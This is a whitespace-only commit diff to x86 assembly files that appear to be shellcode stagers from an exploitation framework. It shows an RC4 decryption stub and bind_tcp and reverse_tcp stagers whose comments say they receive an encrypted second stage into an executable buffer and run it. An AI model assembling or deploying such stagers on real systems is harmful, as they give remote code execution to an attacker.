Whitespace
parent
4a17a30ffd
commit
b3c78f74d2
|
@ -19,7 +19,7 @@ init:
|
|||
inc al ; increase byte to write (EDI is increased automatically)
|
||||
jnz init ; loop until we wrap around
|
||||
sub edi, 0x100 ; restore EDI
|
||||
|
||||
|
||||
; permute S-box according to key
|
||||
xor ebx, ebx ; Clear EBX (EAX is already cleared)
|
||||
permute:
|
||||
|
@ -32,8 +32,8 @@ permute:
|
|||
mov [edi+eax], dl
|
||||
inc al ; AL += 1 until we wrap around
|
||||
jnz permute
|
||||
|
||||
|
||||
|
||||
|
||||
; decryption loop
|
||||
xor ebx, ebx ; Clear EBX (EAX is already cleared)
|
||||
decrypt:
|
||||
|
|
|
@ -17,4 +17,4 @@ start: ;
|
|||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv_rc4.asm"
|
||||
; By now we will have received in the second stage into a RWX buffer and be executing it
|
||||
; By now we will have received in the second stage into a RWX buffer and be executing it
|
||||
|
|
|
@ -18,4 +18,4 @@ start: ;
|
|||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv_rc4.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
; c1.encrypt
|
||||
; c1.key="Hello, my world!"
|
||||
; c1.update("This is some magic data you may want to have encoded and decoded again").unpack("H*")
|
||||
;
|
||||
;
|
||||
; => "882353c5de0f5e6b10bf0d25c432c5d16424dc797e895f37f261c893b31d577e7e69f77e07aa576d58c7f757164e7d74988feb10f972b28dcfa1e3a2b1cc0b0fa1a8b116294b"
|
||||
;
|
||||
; c1 = OpenSSL::Cipher::Cipher.new('RC4')
|
||||
|
|
Loading…
Reference in New Issue